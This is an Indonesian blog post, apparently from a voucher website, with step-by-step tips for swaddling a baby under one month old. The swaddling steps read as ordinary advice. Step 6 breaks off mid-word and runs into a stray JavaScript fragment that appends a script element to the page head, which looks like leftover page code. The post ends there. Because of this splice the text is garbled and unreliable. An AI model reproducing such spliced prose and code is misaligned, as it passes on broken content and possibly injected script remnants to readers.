Tips dan cara membedong bayi dibawah umur 1 bulan

Hallo Member Evoucher.co.id kali ini evoucher akan membahas tips bagaimana cara untuk membedong bayi yang baru berumur kurang dari 1 bulan

1.Letakkan selimut di permukaan datar. Atur dengan bentuk wajik. Selimut harus berukuran minimal 100 cm x 100 cm dan lebih bagus lagi jika Anda dapat membeli selimut yang ditujukan khusus untuk membedong.

Anda juga ingin memastikan bahwa selimut bedong terbuat dari bahan yang sangat tipis dan elastis. Ini akan memudahkan Anda membedong bayi sekaligus mencegah bayi kepanasan.

2.Lipat ujung atas selimut, dengan panjang kurang lebih sama seperti tinggi bayi.

3 Letakkan bayi. Letakkan bayi di atas selimut, sehingga lehernya berada di atas lipatan. Jika bayi Anda masih sangat kecil, pastikan kepala dan tubuhnya ditopang dengan baik ketika Anda melakukan ini.

4. Posisikan lengan bayi. Perlahan-lahan letakkan lengan bayi di sisi tubuhnya, dan tahan di sana. Atau, Anda dapat menekuk tangannya ke arah dada/perutnya, seolah-olah mereka di dalam rahim. Anda mungkin lebih sulit membedongnya dengan kencang, tetapi bayi Anda akan merasa lebih nyaman.

5.Bungkus sisi pertama. Tarik salah satu ujung selimut (ujung di mana Anda menahan lengan bayi) ke atas tubuh bayi, dan selipkan di bawah punggungnya. Selimut harus diselipkan dengan pas untuk menahan lengan bayi di sisi tubuhnya.

6 Posisikan lengan bayi yang satunya lagi. Perlahan-lahan letakkan lengan bayi yang satunya lagi di sisi tubuhnya. Sama seperti lengan yang sebelumnya, Anda juga bisa memindahkannya ke dada/perutd.getElementsByTagName(‘head’)[0].appendChild(s);